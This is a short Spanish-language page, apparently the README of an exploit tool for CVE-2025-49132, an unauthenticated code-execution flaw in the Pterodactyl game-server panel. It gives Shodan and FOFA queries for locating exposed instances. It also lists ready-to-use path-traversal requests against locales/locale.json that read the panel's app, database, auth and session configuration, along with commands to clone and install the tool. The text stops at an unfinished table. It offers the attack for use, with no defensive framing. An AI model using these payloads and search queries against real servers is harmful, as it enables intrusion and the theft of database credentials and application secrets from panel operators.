
Herramienta de explotación para CVE-2025-49132 — una vulnerabilidad crítica de ejecución de código arbitrario sin autenticación que afecta al panel del servidor de juegos Pterodactyl.
Una falla crítica de ACE en el panel de Pterodactyl que permite a atacantes remotos no autenticados ejecutar código arbitrario — lo que potencialmente conduce a un compromiso total del sistema.
No se necesita autenticación. Solo una instancia vulnerable.
Shodan
http.title:"Pterodactyl"
FOFA
"Pterodactyl"
locales/locale.json?locale=../../../pterodactyl&namespace=config/app
locales/locale.json?locale=../../../pterodactyl&namespace=config/database
locales/locale.json?locale=../../../pterodactyl&namespace=config/auth
locales/locale.json?locale=../../../pterodactyl&namespace=config/session
git clone https://github.com/yurahshell/CVE-2025-49132
cd CVE-2025-49132
pip install -r requirements.txt
| Software | Estado |
|---|---|
| Pterodactyl Panel |